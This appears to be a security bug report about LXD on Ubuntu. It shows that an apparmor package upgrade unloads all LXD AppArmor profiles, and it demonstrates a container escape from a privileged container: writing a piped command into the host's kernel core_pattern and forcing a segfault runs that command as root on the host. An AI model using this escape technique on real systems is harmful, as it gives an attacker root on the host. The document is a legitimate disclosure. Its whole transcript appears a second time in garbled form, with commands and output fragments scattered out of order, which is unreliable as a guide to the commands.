Apparmor package upgrades unloads all LXD apparmor profiles, making all LXD containers unconfined.
Example:
# Create an unprivileged and a privileged container
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
Creating c1
Starting c1
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
Creating c2
Starting c2
# Look at their apparmor profiles (expected values)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)
# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...
# And look at the now unconfined containers
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c2_<var-lib-lxd>://unconfined
# The LXD profiles are also entirely gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$
# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+ Segmentation fault (core dumped) sleep 30
root@c2:~# exit
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned
Apparmor package upgrades unloads all LXD apparmor profiles, making all LXD containers unconfined.
Example:
# Create an unprivileged and a privileged container dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1 dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security. privileged= true
stgraber@
Creating c1
Starting c1
stgraber@
Creating c2
Starting c2
# Look at their apparmor profiles (expected values) dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current </var/lib/ lxd>//& :lxd-c1_ <var-lib- lxd>:// unconfined (enforce)
stgraber@
lxd-c1_
stgraber@ dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current </var/lib/ lxd>//& :lxd-c2_ <var-lib- lxd>:// unconfined (enforce)
lxd-c2_
# Apply an apparmor upgrade dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ sudo apt upgrade us.archive. ubuntu. com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB] 2.11.0- 2ubuntu1_ amd64.deb ... 4ubuntu5. 1) ... d/abstractions/ X ... d/abstractions/ authentication ... d/abstractions/ base ... d/abstractions/ dbus-session- strict ... d/abstractions/ gnome ... d/abstractions/ nameservice ... d/abstractions/ php5 ... d/abstractions/ samba ... d/abstractions/ ssl_certs ... d/abstractions/ ssl_keys ... d/abstractions/ ubuntu- browsers ... d/abstractions/ ubuntu- helpers ... d/abstractions/ user-mail ... d/disable: usr.sbin.rsyslogd d/disable: usr.sbin.sssd
stgraber@
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
Installing new version of config file /etc/apparmor.
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.
Skipping profile in /etc/apparmor.
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...
# And look at the now unconfined containers dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current /&:lxd- c1_<var- lib-lxd> ://unconfined dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current /&:lxd- c2_<var- lib-lxd> ://unconfined
stgraber@
unconfined/
stgraber@
unconfined/
# The LXD profiles are also entirely gone dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ ls /sys/kernel/ security/ apparmor/ policy/ profiles/ | grep lxd dakara: ~/data/ code/lxc/ lxd (stgraber/master)$
stgraber@
stgraber@
# And to confirm that apparmor is in fact gone dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ lxc exec c2 bash kernel/ core_pattern
stgraber@
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+ Segmentation fault (core dumped) sleep 30
root@c2:~# exit
stgraber@ dakara: ~/data/ code/lxc/ lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned
This was originally reported (though not as a security issue) here: https:/ /github. com/lxc/ lxd/issues/ 2981